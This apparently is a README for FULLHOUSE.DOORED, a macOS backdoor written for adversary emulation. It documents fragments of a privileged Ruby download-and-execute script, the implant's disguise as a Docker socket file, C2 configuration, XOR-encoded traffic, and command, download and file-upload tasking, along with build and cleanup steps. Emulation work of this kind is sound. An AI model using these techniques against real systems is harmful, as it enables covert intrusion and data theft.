FULLHOUSE.DOORED is a first-stage backdoor downloaded and executed via a Ruby script executed with elevated privileges, emulating compromise of a JumpCloud agent. It is used primarily to deploy the second-stage backdoor, STRATOFEAR. FULLHOUSE.DOORED is written in C++ and Objective-C and communicates over HTTP.
Usage Examples
Basic Execution
FULLHOUSE.DOORED does not take any command line arguments but requires a configuration file with the following format to exist in the same directory, where the first line is the C2 IP address for the implant to connect to and the second line is the UUID for the implant to use for registering with the C2 server:
FULLHOUSE.DOORED is intended to be downloaded over HTTPS then executed via the
require 'open-uri'
path_to_fullhouse = '/usr/local/bin/com.docker.sock'
File.open(path_to_fullhouse, 'wb') do |file|
File.chmod(0755, path_to_fullhouse)
path_to_config = '/usr/local/bin/com.docker.sock.lock'
File.open(path_to_config, 'wb') do |file|
The backdoor can alternatively be executed via the command line:
# assumes config file (com.docker.sock.lock) is in the same directory
HTTP request bodies are XOR-encrypted using the key F
then base64 encoded.
Command Execution
If tasked to execute whoami
File Download
If tasked to download myPayload
File Upload
If tasked to upload secrets.txt
Build Instructions 🏗️
FULLHOUSE.DOORED can be built in Debug or Release mode using the included
minimum version3.26
minimum version1.11.1
Google Test
minimum version1.14.0
(for testing)
On the macOS host for building:
brew install cmake ninja googletest
Build Command Line
Build both Debug and Release configurations of FULLHOUSE.DOORED.
cmake --workflow --preset cicd-debug
cmake --workflow --preset cicd-release
💡 This will Configure, Build and Test. To Configure only, run: cmake --preset default
For simplicity, all of the generated artifacts can be bundled into the
top-level install/
directory using the CMake installation facility.
cmake --install ./build --config release
cmake --install ./build --config debug
is the production payload for FULLHOUSE.DOORED.
Build Presets
Command Line
NOTE: This section assumes Configuration has been completed.
For building for debug:
cmake --build --preset debug --clean-first
is the debug payload for FULLHOUSE.DOORED.
For building for release:
cmake --build --preset release --clean-first
is the production payload for FULLHOUSE.DOORED.
Update FULLHOUSE.DOORED Implant Configuration
Update the following variables in CMakePresets.json to modify the implant configuration:
"UUID_CMAKE": "01A48A493AC92607E79CB427067C0A42",
"CONFIG_FILE_NAME_CMAKE": "com.docker.sock.lock"
Install 📦
Installing FULLHOUSE.DOORED simply copies all of the artifacts from both Release
and Debug builds into the top-level install/
directory. This is simply for
ease of use and distributability.
The final product should be a top-level directory named install/
with the
following layout:
├─ install/
├─ Debug/
│ ├─ config
│ ├─ main
├─ Release/
│ ├─ config
| ├─ main
Install Command Line
cmake --install ./build
Test 🧪
The cicd-debug
Test Command Line
ctest --preset all
Cleanup 🧹
Execute the fullhouse_cleanup.sh script:
chmod +x fullhouse_cleanup.sh
sudo ./fullhouse_cleanup.sh
Troubleshoot 🤔
FULLHOUSE.DOORED will create a log file fdlog.log
in the current working directory. The log file is XOR encrypted with the key FEEDCAFE
Decrypting the log file
Use the log_decryptor decrypt the log file:
python3 aes_base64_log_decryptor.py -i fdlog.log -o dec_fdlog.log -k FEEDCAFE --xor
View the contents of the decrypted log file:
cat dec_fdlog.log
Development and debugging of FULLHOUSE.DOORED was conducted using Visual Studio Code. The following extensions were required:
- C/C++
- C/C++ Extension Pack
- CMake
- CMake Tools
If using VS Code Remote Explorer, ensure developer mode is enabled for the session over SSH:
sudo DevToolsSecurity -enable
Ensure your Visual Studio Code CMake configuration has the following selected:
If your CMake status bar is set to visible
, your status bar at the bottom of your Visual Studio Code window should reflect the following:
Use the following launch.json
and tasks.json
for debugging with Visual Studio Code:
"version": "0.2.0",
"configurations": [
"name": "Debug FULLHOUSE.DOORED",
"type": "cppdbg",
"request": "launch",
"program": "${workspaceFolder}/build/src/Debug/main",
"MIMode": "lldb",
"args": [],
"cwd": "${workspaceFolder}",
"externalConsole": false,
"environment": [],
"preLaunchTask": "Build FULLHOUSE.DOORED"
"version": "2.0.0",
"tasks": [
"type": "cmake",
"label": "Build FULLHOUSE.DOORED",
"command": "build",
"targets": [
"preset": "${command:cmake.activeBuildPresetName}",
"group": {
"kind": "build",
"isDefault": true
"problemMatcher": [],
"detail": "CMake template build task"
This CMakePresets.json follows version 6. Because the CMake extension in VS Code compares against version 4, you will need to ensure cmake.allowUnspportedPresetsVersion
is set to true
in settings.json
. The additional field debug.allowBreakpointsEverywhere
was also added to allow breakpoints to be set in the Objective-C++ (.mm) files:
"cmake.allowUnsupportedPresetsVersions": true,
"debug.allowBreakpointsEverywhere": true